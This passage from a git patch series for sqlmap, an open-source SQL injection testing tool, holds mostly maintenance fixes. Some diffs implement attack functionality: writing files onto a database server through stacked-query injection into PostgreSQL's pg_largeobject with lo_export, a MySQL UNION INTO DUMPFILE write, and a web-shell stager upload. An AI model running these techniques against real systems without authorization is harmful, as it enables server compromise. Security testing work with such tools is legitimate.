-        sqlQueries = self.fileToSqlQueries(fcEncodedList)
-
-        logger.debug("inserting the base64 encoded file to the support table")
-
-        for sqlQuery in sqlQueries:
-            inject.goStacked(sqlQuery)
-
         debugMsg = "create a new OID for a large object, it implicitly "
         debugMsg += "adds an entry in the large objects system table"
         logger.debug(debugMsg)
@@ -70,44 +51,25 @@ class Filesystem(GenericFilesystem):
         # References:
         # http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
         # http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html
+
         inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
-        inject.goStacked("SELECT lo_create(%d)" % self.oid)
 
-        debugMsg = "updating the system large objects table assigning to "
-        debugMsg += "the just created OID the binary (base64 decoded) UDF "
-        debugMsg += "as data"
-        logger.debug(debugMsg)
+        for offset in xrange(0, wFileSize, LOBLKSIZE):
+            fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], "base64", False)
+            sqlQueries = self.fileToSqlQueries(fcEncodedList)
 
-        # Refereces:
-        # * http://www.postgresql.org/docs/8.3/interactive/catalog-pg-largeobject.html
-        # * http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql
-        #
-        # NOTE: From PostgreSQL site:
-        #
-        #   "The data stored in the large object will never be more than
-        #   LOBLKSIZE bytes and might be less which is BLCKSZ/4, or
-        #   typically 2 Kb"
-        #
-        # As a matter of facts it was possible to store correctly a file
-        # large 13776 bytes, the problem arises at next step (lo_export())
-        #
-        # Inject manually into PostgreSQL system table pg_largeobject the
-        # base64-decoded file content. Note that PostgreSQL >= 9.0 does
-        # not accept UPDATE into that table for some reason.
-        self.getVersionFromBanner()
-        banVer = kb.bannerFp["dbmsVersion"]
+            for sqlQuery in sqlQueries:
+                inject.goStacked(sqlQuery)
 
-        if banVer >= "9.0":
-            inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, 0, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.tblField, self.fileTblName))
-        else:
-            inject.goStacked("UPDATE pg_largeobject SET data=(DECODE((SELECT %s FROM %s), 'base64')) WHERE loid=%d" % (self.tblField, self.fileTblName, self.oid))
+            inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, %d, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.page, self.tblField, self.fileTblName))
+            inject.goStacked("DELETE FROM %s" % self.fileTblName)
+
+            self.page += 1
 
         debugMsg = "exporting the OID %s file content to " % fileType
         debugMsg += "file '%s'" % dFile
         logger.debug(debugMsg)
 
-        # NOTE: lo_export() exports up to only 8192 bytes of the file
-        # (pg_largeobject 'data' field)
         inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, dFile), silent=True)
 
         written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py
index 0ff2a4a2c..faf582f5d 100644
--- a/plugins/generic/filesystem.py
+++ b/plugins/generic/filesystem.py
@@ -42,7 +42,7 @@ class Filesystem:
             lengthQuery = "LENGTH(LOAD_FILE('%s'))" % remoteFile
 
         elif Backend.isDbms(DBMS.PGSQL) and not fileRead:
-            lengthQuery = "SELECT LENGTH(data) FROM pg_largeobject WHERE loid=%d" % self.oid
+            lengthQuery = "SELECT SUM(LENGTH(data)) FROM pg_largeobject WHERE loid=%d" % self.oid
 
         elif Backend.isDbms(DBMS.MSSQL):
             self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)")
@@ -105,20 +105,27 @@ class Filesystem:
 
         return sqlQueries
 
-    def fileEncode(self, fileName, encoding, single):
+    def fileEncode(self, fileName, encoding, single, chunkSize=256):
         """
         Called by MySQL and PostgreSQL plugins to write a file on the
         back-end DBMS underlying file system
         """
 
-        retVal = []
         with open(fileName, "rb") as f:
-            content = f.read().encode(encoding).replace("\n", "")
+            content = f.read()
+
+        return self.fileContentEncode(content, encoding, single, chunkSize)
+
+    def fileContentEncode(self, content, encoding, single, chunkSize=256):
+        retVal = []
+
+        if encoding:
+            content = content.encode(encoding).replace("\n", "")
 
         if not single:
-            if len(content) > 256:
-                for i in xrange(0, len(content), 256):
-                    _ = content[i:i + 256]
+            if len(content) > chunkSize:
+                for i in xrange(0, len(content), chunkSize):
+                    _ = content[i:i + chunkSize]
 
                     if encoding == "hex":
                         _ = "0x%s" % _

From ff6b62adf3a2903fcec19327986b716a385f159a Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 24 Jul 2015 15:15:41 +0200
Subject: [PATCH 479/492] Important additional patch for #1170 (for PgSQL >=
 9.0)

---
 plugins/dbms/postgresql/filesystem.py | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/plugins/dbms/postgresql/filesystem.py b/plugins/dbms/postgresql/filesystem.py
index d3bc2516e..72cf7c75f 100644
--- a/plugins/dbms/postgresql/filesystem.py
+++ b/plugins/dbms/postgresql/filesystem.py
@@ -53,6 +53,8 @@ class Filesystem(GenericFilesystem):
         # http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html
 
         inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
+        inject.goStacked("SELECT lo_create(%d)" % self.oid)
+        inject.goStacked("DELETE FROM pg_largeobject WHERE loid=%d" % self.oid)
 
         for offset in xrange(0, wFileSize, LOBLKSIZE):
             fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], "base64", False)

From 314df093f17efa04283995fc28f96e1ba6262f88 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 26 Jul 2015 16:06:01 +0200
Subject: [PATCH 480/492] Fixes #1314

---
 lib/request/connect.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 7b05f8385..e1d4fc6b6 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -575,7 +575,7 @@ class Connect(object):
                 debugMsg = "got HTTP error code: %d (%s)" % (code, status)
                 logger.debug(debugMsg)
 
-        except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, httplib.ResponseNotReady, struct.error, ProxyError, SqlmapCompressionException, WebSocketException), e:
+        except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, httplib.ResponseNotReady, httplib.UnknownProtocol, struct.error, ProxyError, SqlmapCompressionException, WebSocketException), e:
             tbMsg = traceback.format_exc()
 
             if "no host given" in tbMsg:

From e7af0814474769f00f3b4fe9bd11f3f3112940fe Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 26 Jul 2015 16:08:30 +0200
Subject: [PATCH 481/492] Minor patch

---
 lib/core/common.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 44465c7e8..b54a7c41d 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -3016,7 +3016,7 @@ def maskSensitiveData(msg):
 
     retVal = getUnicode(msg)
 
-    for item in filter(None, map(lambda x: conf.get(x), ("hostname", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy"))):
+    for item in filter(None, map(lambda x: conf.get(x), ("hostname", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile"))):
         regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", getUnicode(item))
         while extractRegexResult(regex, retVal):
             value = extractRegexResult(regex, retVal)

From b0bc3149f9ebe0a5c29c4e9d3bc750fd6915f023 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 26 Jul 2015 16:18:41 +0200
Subject: [PATCH 482/492] Fixes #1315

---
 lib/core/option.py     | 8 ++++++++
 lib/request/connect.py | 2 +-
 2 files changed, 9 insertions(+), 1 deletion(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index b73152469..01976e742 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1685,6 +1685,13 @@ def _cleanupOptions():
     threadData = getCurrentThreadData()
     threadData.reset()
 
+def _dirtyPatches():
+    """
+    Place for "dirty" Python related patches
+    """
+
+    httplib._MAXLINE = 1 * 1024 * 1024  # to accept overly long result lines (e.g. SQLi results in HTTP header responses)
+
 def _purgeOutput():
     """
     Safely removes (purges) output directory.
@@ -2469,6 +2476,7 @@ def init():
     _saveCmdline()
     _setRequestFromFile()
     _cleanupOptions()
+    _dirtyPatches()
     _purgeOutput()
     _checkDependencies()
     _createTemporaryDirectory()
diff --git a/lib/request/connect.py b/lib/request/connect.py
index e1d4fc6b6..8914e6cb0 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -575,7 +575,7 @@ class Connect(object):
                 debugMsg = "got HTTP error code: %d (%s)" % (code, status)
                 logger.debug(debugMsg)
 
-        except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, httplib.ResponseNotReady, httplib.UnknownProtocol, struct.error, ProxyError, SqlmapCompressionException, WebSocketException), e:
+        except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, ProxyError, SqlmapCompressionException, WebSocketException), e:
             tbMsg = traceback.format_exc()
 
             if "no host given" in tbMsg:

From e3553ae8932477d63cc1146fecf1b4f1bdee0c2a Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 26 Jul 2015 16:19:44 +0200
Subject: [PATCH 483/492] Missing import

---
 lib/core/option.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/core/option.py b/lib/core/option.py
index 01976e742..04cccf4e3 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -9,6 +9,7 @@ import cookielib
 import glob
 import inspect
 import logging
+import httplib
 import os
 import random
 import re

From 64b45f2ac2699096ffce9482027bf47761978917 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 26 Jul 2015 16:34:11 +0200
Subject: [PATCH 484/492] Fixes #1316

---
 plugins/generic/filesystem.py | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py
index faf582f5d..0aaae5b83 100644
--- a/plugins/generic/filesystem.py
+++ b/plugins/generic/filesystem.py
@@ -6,6 +6,7 @@ See the file 'doc/COPYING' for copying permission
 """
 
 import os
+import sys
 
 from lib.core.agent import agent
 from lib.core.common import dataToOutFile
@@ -13,11 +14,13 @@ from lib.core.common import Backend
 from lib.core.common import checkFile
 from lib.core.common import decloakToTemp
 from lib.core.common import decodeHexValue
+from lib.core.common import getUnicode
 from lib.core.common import isNumPosStrValue
 from lib.core.common import isListLike
 from lib.core.common import isStackingAvailable
 from lib.core.common import isTechniqueAvailable
 from lib.core.common import readInput
+from lib.core.common import unArrayizeValue
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -62,6 +65,7 @@ class Filesystem:
 
             if isNumPosStrValue(remoteFileSize):
                 remoteFileSize = long(remoteFileSize)
+                localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding())
                 sameFile = False
 
                 if localFileSize == remoteFileSize:

From 401905b2dd686509278988f8ec279356c79701b7 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 26 Jul 2015 17:02:46 +0200
Subject: [PATCH 485/492] Minor improvement to UNION file write

---
 lib/core/agent.py                | 4 +++-
 lib/core/option.py               | 1 +
 plugins/dbms/mysql/filesystem.py | 5 +++++
 3 files changed, 9 insertions(+), 1 deletion(-)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index 59c361455..556f379a9 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -79,7 +79,9 @@ class Agent(object):
 
         retVal = ""
 
-        if where is None and isTechniqueAvailable(kb.technique):
+        if kb.forceWhere:
+            where = kb.forceWhere
+        elif where is None and isTechniqueAvailable(kb.technique):
             where = kb.injection.data[kb.technique].where
 
         if kb.injection.place is not None:
diff --git a/lib/core/option.py b/lib/core/option.py
index 04cccf4e3..dcef83c03 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1795,6 +1795,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.followSitemapRecursion = None
     kb.forcedDbms = None
     kb.forcePartialUnion = False
+    kb.forceWhere = None
     kb.futileUnion = None
     kb.headersFp = {}
     kb.heuristicDbms = None
diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py
index 5e10266a9..1bfd8f621 100644
--- a/plugins/dbms/mysql/filesystem.py
+++ b/plugins/dbms/mysql/filesystem.py
@@ -7,6 +7,8 @@ See the file 'doc/COPYING' for copying permission
 
 from lib.core.common import isNumPosStrValue
 from lib.core.common import isTechniqueAvailable
+from lib.core.common import popValue
+from lib.core.common import pushValue
 from lib.core.common import randomStr
 from lib.core.common import singleTimeWarnMessage
 from lib.core.data import conf
@@ -97,8 +99,11 @@ class Filesystem(GenericFilesystem):
         debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
         logger.debug(debugMsg)
 
+        pushValue(kb.forceWhere)
+        kb.forceWhere = PAYLOAD.WHERE.NEGATIVE
         sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile)
         unionUse(sqlQuery, unpack=False)
+        kb.forceWhere = popValue()
 
         warnMsg = "expect junk characters inside the "
         warnMsg += "file as a leftover from UNION query"

From ba86153d291a2ca3bd116a6a4d66b22c28144919 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 28 Jul 2015 09:33:40 +0200
Subject: [PATCH 486/492] Fixes #1318

---
 plugins/dbms/mssqlserver/enumeration.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py
index 12e51a317..9ea67eff9 100644
--- a/plugins/dbms/mssqlserver/enumeration.py
+++ b/plugins/dbms/mssqlserver/enumeration.py
@@ -14,6 +14,7 @@ from lib.core.common import isNoneValue
 from lib.core.common import isNumPosStrValue
 from lib.core.common import isTechniqueAvailable
 from lib.core.common import safeSQLIdentificatorNaming
+from lib.core.common import safeStringFormat
 from lib.core.common import unArrayizeValue
 from lib.core.common import unsafeSQLIdentificatorNaming
 from lib.core.data import conf
@@ -136,7 +137,7 @@ class Enumeration(GenericEnumeration):
                 tables = []
 
                 for index in xrange(int(count)):
-                    _ = (rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db) % index
+                    _ = safeStringFormat((rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db), index)
 
                     table = inject.getValue(_, union=False, error=False)
                     if not isNoneValue(table):

From 301aca57e61fe04dd964fca0414804c820567092 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 29 Jul 2015 10:00:15 +0200
Subject: [PATCH 487/492] Fixes #1319

---
 lib/core/common.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index b54a7c41d..3ca8dad31 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1102,7 +1102,7 @@ def setPaths():
     paths.SQLMAP_XML_BANNER_PATH = os.path.join(paths.SQLMAP_XML_PATH, "banner")
     paths.SQLMAP_XML_PAYLOADS_PATH = os.path.join(paths.SQLMAP_XML_PATH, "payloads")
 
-    _ = os.path.join(os.path.expanduser("~"), ".sqlmap")
+    _ = os.path.join(os.path.expandvars(os.path.expanduser("~")), ".sqlmap")
     paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding())
     paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
     paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")

From bcb25823e6d03196a605c8876c0737198f98ccdf Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 30 Jul 2015 23:19:38 +0200
Subject: [PATCH 488/492] Fixes #1320

---
 lib/core/common.py         | 4 ++--
 lib/core/dump.py           | 4 ++--
 lib/core/option.py         | 2 +-
 lib/core/replication.py    | 2 +-
 lib/parse/cmdline.py       | 2 +-
 lib/utils/hash.py          | 3 ++-
 plugins/generic/entries.py | 4 ++--
 7 files changed, 11 insertions(+), 10 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 3ca8dad31..5b914b159 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -876,7 +876,7 @@ def dataToOutFile(filename, data):
                 f.write(data)
         except IOError, ex:
             errMsg = "something went wrong while trying to write "
-            errMsg += "to the output file ('%s')" % ex
+            errMsg += "to the output file ('%s')" % getUnicode(ex)
             raise SqlmapGenericException(errMsg)
 
     return retVal
@@ -3662,7 +3662,7 @@ def evaluateCode(code, variables=None):
     except KeyboardInterrupt:
         raise
     except Exception, ex:
-        errMsg = "an error occurred while evaluating provided code ('%s'). " % ex
+        errMsg = "an error occurred while evaluating provided code ('%s') " % getUnicode(ex)
         raise SqlmapGenericException(errMsg)
 
 def serializeObject(object_):
diff --git a/lib/core/dump.py b/lib/core/dump.py
index d3b9cc799..08410602d 100644
--- a/lib/core/dump.py
+++ b/lib/core/dump.py
@@ -74,7 +74,7 @@ class Dump(object):
         try:
             self._outputFP.write(text)
         except IOError, ex:
-            errMsg = "error occurred while writing to log file ('%s')" % ex
+            errMsg = "error occurred while writing to log file ('%s')" % getUnicode(ex)
             raise SqlmapGenericException(errMsg)
 
         if kb.get("multiThreadMode"):
@@ -94,7 +94,7 @@ class Dump(object):
         try:
             self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb")
         except IOError, ex:
-            errMsg = "error occurred while opening log file ('%s')" % ex
+            errMsg = "error occurred while opening log file ('%s')" % getUnicode(ex)
             raise SqlmapGenericException(errMsg)
 
     def getOutputFile(self):
diff --git a/lib/core/option.py b/lib/core/option.py
index dcef83c03..f5edb95b4 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1521,7 +1521,7 @@ def _createTemporaryDirectory():
             os.makedirs(tempfile.gettempdir())
     except IOError, ex:
         errMsg = "there has been a problem while accessing "
-        errMsg += "system's temporary directory location(s) ('%s'). Please " % ex
+        errMsg += "system's temporary directory location(s) ('%s'). Please " % getUnicode(ex)
         errMsg += "make sure that there is enough disk space left. If problem persists, "
         errMsg += "try to set environment variable 'TEMP' to a location "
         errMsg += "writeable by the current user"
diff --git a/lib/core/replication.py b/lib/core/replication.py
index b65f818de..c5bbd24cc 100644
--- a/lib/core/replication.py
+++ b/lib/core/replication.py
@@ -70,7 +70,7 @@ class Replication(object):
             try:
                 self.parent.cursor.execute(sql, parameters)
             except sqlite3.OperationalError, ex:
-                errMsg = "problem occurred ('%s') while accessing sqlite database " % ex
+                errMsg = "problem occurred ('%s') while accessing sqlite database " % unicode(ex)
                 errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath
                 errMsg += "it's not used by some other program"
                 raise SqlmapGenericException(errMsg)
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 23add4a9d..ef2f535f7 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -862,7 +862,7 @@ def cmdLineParser():
                 for arg in shlex.split(command):
                     argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
             except ValueError, ex:
-                raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex
+                raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % getUnicode(ex)
 
         # Hide non-basic options in basic help case
         for i in xrange(len(argv)):
diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index 123b93ee7..b1459b032 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -44,6 +44,7 @@ from lib.core.common import clearConsoleLine
 from lib.core.common import dataToStdout
 from lib.core.common import getFileItems
 from lib.core.common import getPublicTypeMembers
+from lib.core.common import getUnicode
 from lib.core.common import hashDBRetrieve
 from lib.core.common import hashDBWrite
 from lib.core.common import normalizeUnicode
@@ -769,7 +770,7 @@ def dictionaryAttack(attack_dict):
 
                 except Exception, ex:
                     warnMsg = "there was a problem while loading dictionaries"
-                    warnMsg += " ('%s')" % ex
+                    warnMsg += " ('%s')" % getUnicode(ex)
                     logger.critical(warnMsg)
 
             message = "do you want to use common password suffixes? (slow!) [y/N] "
diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py
index 628f01049..598bf3a01 100644
--- a/plugins/generic/entries.py
+++ b/plugins/generic/entries.py
@@ -341,13 +341,13 @@ class Entries:
                         attackDumpedTable()
                     except (IOError, OSError), ex:
                         errMsg = "an error occurred while attacking "
-                        errMsg += "table dump ('%s')" % ex
+                        errMsg += "table dump ('%s')" % getUnicode(ex)
                         logger.critical(errMsg)
                     conf.dumper.dbTableValues(kb.data.dumpedTable)
 
             except SqlmapConnectionException, ex:
                 errMsg = "connection exception detected in dumping phase "
-                errMsg += "('%s')" % ex
+                errMsg += "('%s')" % getUnicode(ex)
                 logger.critical(errMsg)
 
             finally:

From e623ee66ad459fc620e1a815d1e8ce3b55974c0b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 30 Jul 2015 23:29:31 +0200
Subject: [PATCH 489/492] Better approach for #1320

---
 lib/controller/checks.py   | 2 +-
 lib/core/common.py         | 4 ++--
 lib/core/dump.py           | 4 ++--
 lib/core/option.py         | 2 +-
 lib/parse/cmdline.py       | 2 +-
 lib/parse/configfile.py    | 2 +-
 lib/utils/hash.py          | 2 +-
 plugins/generic/entries.py | 4 ++--
 8 files changed, 11 insertions(+), 11 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 576d20a0f..f4c053ec9 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -1298,7 +1298,7 @@ def checkConnection(suppressOutput=False):
             raise SqlmapConnectionException(errMsg)
         except socket.error, ex:
             errMsg = "problem occurred while "
-            errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getUnicode(ex))
+            errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, ex.message)
             raise SqlmapConnectionException(errMsg)
 
     if not suppressOutput and not conf.dummy and not conf.offline:
diff --git a/lib/core/common.py b/lib/core/common.py
index 5b914b159..6f9303876 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -876,7 +876,7 @@ def dataToOutFile(filename, data):
                 f.write(data)
         except IOError, ex:
             errMsg = "something went wrong while trying to write "
-            errMsg += "to the output file ('%s')" % getUnicode(ex)
+            errMsg += "to the output file ('%s')" % ex.message
             raise SqlmapGenericException(errMsg)
 
     return retVal
@@ -3662,7 +3662,7 @@ def evaluateCode(code, variables=None):
     except KeyboardInterrupt:
         raise
     except Exception, ex:
-        errMsg = "an error occurred while evaluating provided code ('%s') " % getUnicode(ex)
+        errMsg = "an error occurred while evaluating provided code ('%s') " % ex.message
         raise SqlmapGenericException(errMsg)
 
 def serializeObject(object_):
diff --git a/lib/core/dump.py b/lib/core/dump.py
index 08410602d..4401f1742 100644
--- a/lib/core/dump.py
+++ b/lib/core/dump.py
@@ -74,7 +74,7 @@ class Dump(object):
         try:
             self._outputFP.write(text)
         except IOError, ex:
-            errMsg = "error occurred while writing to log file ('%s')" % getUnicode(ex)
+            errMsg = "error occurred while writing to log file ('%s')" % ex.message
             raise SqlmapGenericException(errMsg)
 
         if kb.get("multiThreadMode"):
@@ -94,7 +94,7 @@ class Dump(object):
         try:
             self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb")
         except IOError, ex:
-            errMsg = "error occurred while opening log file ('%s')" % getUnicode(ex)
+            errMsg = "error occurred while opening log file ('%s')" % ex.message
             raise SqlmapGenericException(errMsg)
 
     def getOutputFile(self):
diff --git a/lib/core/option.py b/lib/core/option.py
index f5edb95b4..896446cd0 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1521,7 +1521,7 @@ def _createTemporaryDirectory():
             os.makedirs(tempfile.gettempdir())
     except IOError, ex:
         errMsg = "there has been a problem while accessing "
-        errMsg += "system's temporary directory location(s) ('%s'). Please " % getUnicode(ex)
+        errMsg += "system's temporary directory location(s) ('%s'). Please " % ex.message
         errMsg += "make sure that there is enough disk space left. If problem persists, "
         errMsg += "try to set environment variable 'TEMP' to a location "
         errMsg += "writeable by the current user"
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index ef2f535f7..154c5d7e3 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -862,7 +862,7 @@ def cmdLineParser():
                 for arg in shlex.split(command):
                     argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
             except ValueError, ex:
-                raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % getUnicode(ex)
+                raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message
 
         # Hide non-basic options in basic help case
         for i in xrange(len(argv)):
diff --git a/lib/parse/configfile.py b/lib/parse/configfile.py
index 653faefbc..507cce17b 100644
--- a/lib/parse/configfile.py
+++ b/lib/parse/configfile.py
@@ -73,7 +73,7 @@ def configFileParser(configFile):
         config = UnicodeRawConfigParser()
         config.readfp(configFP)
     except Exception, ex:
-        errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getUnicode(ex)
+        errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % ex.message
         raise SqlmapSyntaxException(errMsg)
 
     if not config.has_section("Target"):
diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index b1459b032..69994d23e 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -770,7 +770,7 @@ def dictionaryAttack(attack_dict):
 
                 except Exception, ex:
                     warnMsg = "there was a problem while loading dictionaries"
-                    warnMsg += " ('%s')" % getUnicode(ex)
+                    warnMsg += " ('%s')" % ex.message
                     logger.critical(warnMsg)
 
             message = "do you want to use common password suffixes? (slow!) [y/N] "
diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py
index 598bf3a01..125aa8226 100644
--- a/plugins/generic/entries.py
+++ b/plugins/generic/entries.py
@@ -341,13 +341,13 @@ class Entries:
                         attackDumpedTable()
                     except (IOError, OSError), ex:
                         errMsg = "an error occurred while attacking "
-                        errMsg += "table dump ('%s')" % getUnicode(ex)
+                        errMsg += "table dump ('%s')" % ex.message
                         logger.critical(errMsg)
                     conf.dumper.dbTableValues(kb.data.dumpedTable)
 
             except SqlmapConnectionException, ex:
                 errMsg = "connection exception detected in dumping phase "
-                errMsg += "('%s')" % getUnicode(ex)
+                errMsg += "('%s')" % ex.message
                 logger.critical(errMsg)
 
             finally:

From c5f3c0cc32e2894ac9f0bf1b2f493534c2ce2d99 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 3 Aug 2015 17:21:35 +0200
Subject: [PATCH 490/492] Fixes #1324

---
 lib/takeover/web.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/takeover/web.py b/lib/takeover/web.py
index 8fab16c3b..40a403dc0 100644
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -263,8 +263,8 @@ class Web:
 
                     with open(filename, "w+") as f:
                         _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
-                        _ = _.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
-                        f.write(utf8encode(_))
+                        _ = _.replace("WRITABLE_DIR", utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory))
+                        f.write(_)
 
                     self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)
 

From 971f59a27eb4e2e7108e88a22889e2f420da3fc5 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 4 Aug 2015 10:28:43 +0200
Subject: [PATCH 491/492] Minor update

---
 sqlmap.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/sqlmap.py b/sqlmap.py
index 161aa6727..ad1451556 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -60,7 +60,7 @@ def modulePath():
     except NameError:
         _ = inspect.getsourcefile(modulePath)
 
-    return getUnicode(os.path.dirname(os.path.realpath(_)), sys.getfilesystemencoding())
+    return getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding())
 
 def main():
     """

From ce64d9797e7feb2c7006acaba00ac88fef9898a5 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 4 Aug 2015 11:10:15 +0200
Subject: [PATCH 492/492] Fixes #1322

---
 sqlmap.py | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/sqlmap.py b/sqlmap.py
index ad1451556..6bb12a56f 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -69,6 +69,15 @@ def main():
 
     try:
         paths.SQLMAP_ROOT_PATH = modulePath()
+
+        try:
+            os.path.isdir(paths.SQLMAP_ROOT_PATH)
+        except UnicodeEncodeError:
+            errMsg = "your system does not properly handle non-ASCII paths. "
